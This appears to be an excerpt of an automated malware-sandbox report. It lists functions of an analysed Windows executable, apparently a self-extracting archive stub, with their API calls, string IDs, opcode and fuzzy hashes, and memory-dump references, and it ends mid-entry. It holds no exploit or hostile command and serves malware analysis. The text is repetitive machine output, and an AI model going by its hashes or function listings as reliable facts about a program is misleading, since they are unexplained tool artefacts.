    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
    • String ID:
    • API String ID: 2148572870-0
    • Opcode ID: 77aed7e52e1915fdf67aaa83b624dd9cadca255047ba097926a3fb54e6175a39
    • Instruction ID: c545d9331c558e9781a3faeb61c88fb491bf9a175a5fa19cd2526189692e1692
    • Opcode Fuzzy Hash: 77aed7e52e1915fdf67aaa83b624dd9cadca255047ba097926a3fb54e6175a39
    • Instruction Fuzzy Hash: 14F0EC72A01229ABCB20ABA5EC4CEDF7F6DEF85791B108421B60BE6051D6349585C7E0
    Function 000BD4D2 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 000C1900: _wcslen.LIBCMT ref: 000C1906
      • Part of subcall function 000BCD5C: _wcsrchr.LIBVCRUNTIME ref: 000BCD73
    • _wcslen.LIBCMT ref: 000BD5A4
    • _wcslen.LIBCMT ref: 000BD5EC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _wcslen$_wcsrchr
    • String ID: .exe$.rar$.sfx
    • API String ID: 3513545583-31770016
    • Opcode ID: e14821c295e6c600499c79051dd7778089acb2817887f8ed64e17e99185133a0
    • Instruction ID: 7ded1820981896a17e031ba594ed78ab97cc0f8404f036457d526eb0ca1fbed8
    • Opcode Fuzzy Hash: e14821c295e6c600499c79051dd7778089acb2817887f8ed64e17e99185133a0
    • Instruction Fuzzy Hash: 2B412722900B5099D731AF348846AFFF3F8EF55758B14490FF996AB182F7608E81D399
    Function 000CDFBA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
    Download Yara Rule
    APIs
    • GetTempPathW.KERNEL32(00000800,?), ref: 000CDFD0
      • Part of subcall function 000BCAA0: _wcslen.LIBCMT ref: 000BCAA6
    • _swprintf.LIBCMT ref: 000CE004
      • Part of subcall function 000B4A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000B4A33
    • SetDlgItemTextW.USER32(?,00000066,00102892), ref: 000CE024
    • EndDialog.USER32(?,00000001), ref: 000CE131
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
    • String ID: %s%s%u
    • API String ID: 110358324-1360425832
    • Opcode ID: 06d203922446a80baeb037edb16ed5997c6eb63e451df692151d8ffe53ffbdce
    • Instruction ID: f1c15801c207a6102f8aefc06fd6b50f0bef39b4f50a5ae2ab02958084d8d711
    • Opcode Fuzzy Hash: 06d203922446a80baeb037edb16ed5997c6eb63e451df692151d8ffe53ffbdce
    • Instruction Fuzzy Hash: 05416075900658AADF25DB90CC45FEE77FCEB05304F4480ABF909A7052EFB09A848F61
    Function 000BCF32 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
    Download Yara Rule
    APIs
    • _wcslen.LIBCMT ref: 000BCF56
    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,000BB505,?,?,00000800,?,?,000BB4CA,?), ref: 000BCFF4
    • _wcslen.LIBCMT ref: 000BD06A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _wcslen$CurrentDirectory
    • String ID: UNC$\\?\
    • API String ID: 3341907918-253988292
    • Opcode ID: 1b1768aa4e0bd8a4f1a951d3f7aa82f8a0eaf58b2d3981f0dc82a5901160b86b
    • Instruction ID: f4eca7139b756f23bc03f5916e4da34db0c4834ac76136fa56b4eee1502c0542
    • Opcode Fuzzy Hash: 1b1768aa4e0bd8a4f1a951d3f7aa82f8a0eaf58b2d3981f0dc82a5901160b86b
    • Instruction Fuzzy Hash: 0F41C13145025ABADF20BF20CC01FEEB7A9EF09390F24442BF954E7142F770D9528AA1
    Function 000CC8BD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
    Download Yara Rule
    APIs
    • LoadBitmapW.USER32(00000065), ref: 000CC8CD
    • GetObjectW.GDI32(00000000,00000018,?), ref: 000CC8F2
    • DeleteObject.GDI32(00000000), ref: 000CC924
    • DeleteObject.GDI32(00000000), ref: 000CC947
      • Part of subcall function 000CB6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,000CC91D,00000066), ref: 000CB6D5
      • Part of subcall function 000CB6C2: SizeofResource.KERNEL32(00000000,?,?,?,000CC91D,00000066), ref: 000CB6EC
      • Part of subcall function 000CB6C2: LoadResource.KERNEL32(00000000,?,?,?,000CC91D,00000066), ref: 000CB703
      • Part of subcall function 000CB6C2: LockResource.KERNEL32(00000000,?,?,?,000CC91D,00000066), ref: 000CB712
      • Part of subcall function 000CB6C2: GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,000CC91D,00000066), ref: 000CB72D
      • Part of subcall function 000CB6C2: GlobalLock.KERNEL32(00000000), ref: 000CB73E
      • Part of subcall function 000CB6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 000CB762
      • Part of subcall function 000CB6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 000CB7A7
      • Part of subcall function 000CB6C2: GlobalUnlock.KERNEL32(00000000), ref: 000CB7C6
      • Part of subcall function 000CB6C2: GlobalFree.KERNEL32(00000000), ref: 000CB7CD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
    • String ID: ]
    • API String ID: 1797374341-3352871620
    • Opcode ID: 6b6b5c88e0aa07712c28fd7aaeebe42d8f7c74f1947440a06f6add4852c49914
    • Instruction ID: 7874d7eaf13d1a75c77ddc486b2e4e8b2e066d035c9d050e60403e3a4e79d445
    • Opcode Fuzzy Hash: 6b6b5c88e0aa07712c28fd7aaeebe42d8f7c74f1947440a06f6add4852c49914
    • Instruction Fuzzy Hash: 6A01C036900A01A7E71177A4DC0AFFF3ABADF85B61F140018F944B7292DF358D0986A0
    Function 000CE740 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 000B12F6: GetParent.USER32(?), ref: 000B132A
      • Part of subcall function 000B12F6: GetDlgItem.USER32(00000000,00003021), ref: 000B133A
      • Part of subcall function 000B12F6: SetWindowTextW.USER32(00000000,000E45F4), ref: 000B1350
    • EndDialog.USER32(?,00000001), ref: 000CE78B
    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 000CE7A1
    • SetDlgItemTextW.USER32(?,00000066,?), ref: 000CE7B5
    • SetDlgItemTextW.USER32(?,00000068), ref: 000CE7C4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ItemText$DialogParentWindow
    • String ID: RENAMEDLG
    • API String ID: 364370097-3299779563
    • Opcode ID: 5ce5b0ee4f1c572ddeacda383631324533af1c10539912569767cd4b933e6cb4
    • Instruction ID: c92c826d97bd93575c5be99fe10b3552d4dbcfd59608246442537bc9482605f9
    • Opcode Fuzzy Hash: 5ce5b0ee4f1c572ddeacda383631324533af1c10539912569767cd4b933e6cb4
    • Instruction Fuzzy Hash: C1012832289360BAE2254B64DE08FEF7BADFB99B02F104218F301A64D0C6A259458775
    Function 000D9225 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,000D91D6,?,?,000D9176,?,000ED570,0000000C,000D92CD,?,00000002), ref: 000D9245
    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000D9258
    • FreeLibrary.KERNEL32(00000000,?,?,?,000D91D6,?,?,000D9176,?,000ED570,0000000C,000D92CD,?,00000002,00000000), ref: 000D927B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AddressFreeHandleLibraryModuleProc
    • String ID: CorExitProcess$mscoree.dll
    • API String ID: 4061214504-1276376045
    • Opcode ID: 0a5df77f829b490a79094be3d205e9df4d9a7602b331f51efcd1314a9612711a
    • Instruction ID: eb61a3b51d30498c45ec7e1ea716556e902c3bae649350935ae7f542783e56aa
    • Opcode Fuzzy Hash: 0a5df77f829b490a79094be3d205e9df4d9a7602b331f51efcd1314a9612711a
    • Instruction Fuzzy Hash: 4EF04431A04248BBDF519BA5DC49BADBFB4EF44B11F40016AFA09B6261CB745E41CA50
    Function 000C0620 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 000C1B34: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 000C1B4F
      • Part of subcall function 000C1B34: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,000C0633,Crypt32.dll,00000000,000C06AD,00000200,?,000C0690,00000000,00000000,?), ref: 000C1B71
    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 000C063F
    • GetProcAddress.KERNEL32(000FA1F0,CryptUnprotectMemory), ref: 000C064F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AddressProc$DirectoryLibraryLoadSystem
    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
    • API String ID: 2141747552-1753850145
    • Opcode ID: 64fb42cf842884d0324d0dad38cf2f3780850888aa2ca649bd9b692b55c38fcf
    • Instruction ID: 04cf2f4c0311ba41b2ae1775e6648b9191c6dd389b8c3a644d26b627d685cd6a
    • Opcode Fuzzy Hash: 64fb42cf842884d0324d0dad38cf2f3780850888aa2ca649bd9b692b55c38fcf
    • Instruction Fuzzy Hash: 16E04F708457C19EE7605F769808F46BFD45B54B11F00881EA395A7652D7B4D440CB10
    Function 000D3D5A Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AdjustPointer$_abort
    • String ID:
    • API String ID: 2252061734-0
    • Opcode ID: 74aa9eabf855864e890c31eeb195f46a0ec4b662b861c6740c34114fc7018d8e
    • Instruction ID: 6530d80f0711f88b5abe07e9c319d08dacff04a60aad286789c3b78ea5980952
    • Opcode Fuzzy Hash: 74aa9eabf855864e890c31eeb195f46a0ec4b662b861c6740c34114fc7018d8e
    • Instruction Fuzzy Hash: C051AF75A053069FDB698F14D841BAAB7E5EF54300F14452BE8059B3D2E731EE80CBB2
    Function 000DD0E0 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
    Download Yara Rule
    APIs
    • GetEnvironmentStringsW.KERNEL32 ref: 000DD0E9
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000DD10C
      • Part of subcall function 000DA7EE: RtlAllocateHeap.NTDLL(00000000,?,?,?,000D5584,?,0000015D,?,?,?,?,000D6A60,000000FF,00000000,?,?), ref: 000DA820
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 000DD132
    • _free.LIBCMT ref: 000DD145
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000DD154
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
    • String ID:
    • API String ID: 336800556-0
    • Opcode ID: bd58080c8cb61752a8c60fd774433ad6c9a0873e603bcf649507d47436c7b178
    • Instruction ID: f74a34934082101ebf834fdc481260020b906c45e4588e2d17980272c15972fb
    • Opcode Fuzzy Hash: bd58080c8cb61752a8c60fd774433ad6c9a0873e603bcf649507d47436c7b178
    • Instruction Fuzzy Hash: 9901A276602365BF3B311AB66C8CC7F6AADEFC2FA1314016BFD04D6341EA648C0291B0
    Function 000DA589 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(?,?,?,000DA7E0,000DC338,?,000DA533,00000001,00000364,?,000D53ED,?,?,000F30C4), ref: 000DA58E
    • _free.LIBCMT ref: 000DA5C3
    • _free.LIBCMT ref: 000DA5EA
    • SetLastError.KERNEL32(00000000,?,000F30C4), ref: 000DA5F7
    • SetLastError.KERNEL32(00000000,?,000F30C4), ref: 000DA600
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ErrorLast$_free
    • String ID:
    • API String ID: 3170660625-0
    • Opcode ID: f67eec39441d84cc6bdc76e30901bb7b6be9c47bcbf7e226032ed0d145d4127f
    • Instruction ID: d1d5283d977188c2045fd957733640faed35ed7cf503c469f8bfbc12ab755cae
    • Opcode Fuzzy Hash: f67eec39441d84cc6bdc76e30901bb7b6be9c47bcbf7e226032ed0d145d4127f
    • Instruction Fuzzy Hash: D7014432344B02ABE21227717C89E6B269A9FC3771321042BF904A2387EE388E419076
    Function 000DD9AF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 000DD9C7
      • Part of subcall function 000DA65A: RtlFreeHeap.NTDLL(00000000,00000000,?,000DDA46,?,00000000,?,00000000,?,000DDA6D,?,00000007,?,?,000DDE6A,?), ref: 000DA670
      • Part of subcall function 000DA65A: GetLastError.KERNEL32(?,?,000DDA46,?,00000000,?,00000000,?,000DDA6D,?,00000007,?,?,000DDE6A,?,?), ref: 000DA682
    • _free.LIBCMT ref: 000DD9D9
    • _free.LIBCMT ref: 000DD9EB
    • _free.LIBCMT ref: 000DD9FD
    • _free.LIBCMT ref: 000DDA0F
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: a6655407054045ee33e2f1e288b7a27b4ce1790c1a9920d9af3e975503cd8c85
    • Instruction ID: 7842081cdc3c52e8a02420e0b32c68460ac79b5847526c2cc1b75d4f01caafc4
    • Opcode Fuzzy Hash: a6655407054045ee33e2f1e288b7a27b4ce1790c1a9920d9af3e975503cd8c85
    • Instruction Fuzzy Hash: 8FF0FF72A04300EBD660DB68E986C6673E9BB057117584C07F04CE7A42CB79FC808675
    Function 000C3328 Relevance: 7.5, APIs: 5, Instructions: 39COMMON
    Download Yara Rule
    APIs
    • _wcslen.LIBCMT ref: 000C3330
    • _wcslen.LIBCMT ref: 000C3341
    • _wcslen.LIBCMT ref: 000C3351
    • _wcslen.LIBCMT ref: 000C335F
    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,000BC844,?,?,00000000,?,?,?), ref: 000C337A
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _wcslen$CompareString
    • String ID:
    • API String ID: 3397213944-0
    • Opcode ID: 7e600d45696d34c2b84f8b0a6280d960bc357a98afeabcce4228b663901de82a
    • Instruction ID: 8a641ee59e5f8bab0d08e8f7c8d7fd0873391e79338089c630b3279459777921
    • Opcode Fuzzy Hash: 7e600d45696d34c2b84f8b0a6280d960bc357a98afeabcce4228b663901de82a
    • Instruction Fuzzy Hash: 1FF03033008254BFCF122F51DC09ECE3F26EB44B70B11C426F6195E162CE31D651DAA0
    Function 000D9CC0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 000D9CDE
      • Part of subcall function 000DA65A: RtlFreeHeap.NTDLL(00000000,00000000,?,000DDA46,?,00000000,?,00000000,?,000DDA6D,?,00000007,?,?,000DDE6A,?), ref: 000DA670
      • Part of subcall function 000DA65A: GetLastError.KERNEL32(?,?,000DDA46,?,00000000,?,00000000,?,000DDA6D,?,00000007,?,?,000DDE6A,?,?), ref: 000DA682
    • _free.LIBCMT ref: 000D9CF0
    • _free.LIBCMT ref: 000D9D03
    • _free.LIBCMT ref: 000D9D14
    • _free.LIBCMT ref: 000D9D25
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: ac8d2180760e2c3c720e6d1f9c996b0f42355753d1f8c814d7b0397e491dc860
    • Instruction ID: 2a89ce04aed048b3aff3f65fe1a811f6802b094eec30161515084b5e097dd929
    • Opcode Fuzzy Hash: ac8d2180760e2c3c720e6d1f9c996b0f42355753d1f8c814d7b0397e491dc860
    • Instruction Fuzzy Hash: 00F03AB4901220CFC60A6F14FE464943BA1F727B213058A17F11993BB2C77588C1DBA5
    Function 000CB80C Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 238COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 000CB699: GetDC.USER32(00000000), ref: 000CB69D
      • Part of subcall function 000CB699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 000CB6A8
      • Part of subcall function 000CB699: ReleaseDC.USER32(00000000,00000000), ref: 000CB6B3
    • GetObjectW.GDI32(?,00000018,?), ref: 000CB83C
      • Part of subcall function 000CBACE: GetDC.USER32(00000000), ref: 000CBAD7
      • Part of subcall function 000CBACE: GetObjectW.GDI32(?,00000018,?), ref: 000CBB06
      • Part of subcall function 000CBACE: ReleaseDC.USER32(00000000,?), ref: 000CBB9E
    Strings
    Memory Dump Source
